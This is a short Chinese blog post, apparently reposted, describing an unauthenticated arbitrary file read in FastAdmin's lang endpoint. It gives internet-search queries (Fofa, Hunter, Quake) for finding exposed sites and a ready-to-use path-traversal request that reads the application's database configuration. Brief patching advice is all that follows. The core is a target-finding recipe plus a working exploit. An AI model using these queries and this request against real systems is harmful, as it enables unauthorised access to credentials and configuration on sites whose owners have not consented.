Fastadmin框架 lang任意文件读取漏洞攻略

漏洞介绍

FastAdmin是一个免费开源的后台管理框架,基于ThinkPHP5.1框架开发而成,具有功能全面、界面美观、易于上手的特点。它提供了丰富的后台管理功能模块,包括权限管理、数据库管理、文件管理、图表统计等,可以帮助开发者快速搭建起一个稳定可靠的后台管理系统。其lang存在任意文件读取漏洞,未授权攻击者可以利用其读取网站配置文件等敏感信息。

「Fofa」

 body="/assets/js/require.js"

「Hunter」

web.body="/assets/js/require.js"

「Quake」

body="/assets/js/require.js"

漏洞攻略

构造数据包

GET /index/ajax/lang?lang=../../application/database HTTP/1.1
Host: ip

Fastadmin框架 lang任意文件读取漏洞攻略_第1张图片

修复方案 

  • 官方已发布安全补丁,建议联系厂商打补丁或升级版本。

  • 引入Web应用防火墙防护,配置接口拦截策略。

你可能感兴趣的:(前端,javascript,开发语言,java,网络安全,web安全,spring)